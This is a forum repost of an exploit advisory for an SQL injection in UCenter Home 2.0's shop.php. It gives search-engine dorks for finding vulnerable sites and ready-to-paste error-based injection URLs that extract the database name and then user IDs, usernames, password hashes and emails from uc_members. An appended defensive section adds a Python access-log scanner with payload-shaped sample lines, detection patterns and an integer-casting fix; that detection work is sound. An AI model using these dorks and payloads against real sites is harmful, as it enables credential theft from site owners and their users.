China Network Penetration Testing Alliance

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit the DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

You use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
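
A defender-side check for the request shape described in the post, added here as an example and not part of the original post or of UCenter Home's own code: it scans access-log lines for shop.php requests whose shopid is not a plain integer, and labels those carrying the count(*) / floor(rand( / group by combination of the error-based query. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Feb/2013:21:31:02 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Feb/2013:21:32:10 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20'
    'from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20'
    'group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 312',
    '203.0.113.9 - - [27/Feb/2013:21:32:40 +0800] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 298',
    '203.0.113.7 - - [27/Feb/2013:21:33:00 +0800] "GET /space.php?uid=1 HTTP/1.1" 200 2048',
]

# Client address and request target; tolerant of raw spaces inside the target.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/\d')
# Building blocks of the duplicate-key (error-based) query shown in the post.
ERROR_BASED = [
    re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    re.compile(r"group\s+by", re.I),
]

def classify(shopid):
    """Return 'ok', 'non-numeric' or 'error-based' for one decoded shopid value."""
    if re.fullmatch(r"[0-9]{1,10}", shopid):
        return "ok"  # the only shape a shop id should ever have
    if all(p.search(shopid) for p in ERROR_BASED):
        return "error-based"
    return "non-numeric"

def scan(lines):
    """Return (client_ip, verdict) for every suspicious shop.php request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs URL-decodes values, so %20 and %27 are seen as ' ' and "'".
        for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            verdict = classify(value)
            if verdict != "ok":
                hits.append((ip, verdict))
    return hits

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer-only rule that classify() applies is the fix on the server side: a shopid that is cast to an integer or bound as a numeric parameter before it reaches the query cannot carry the appended clause.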

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2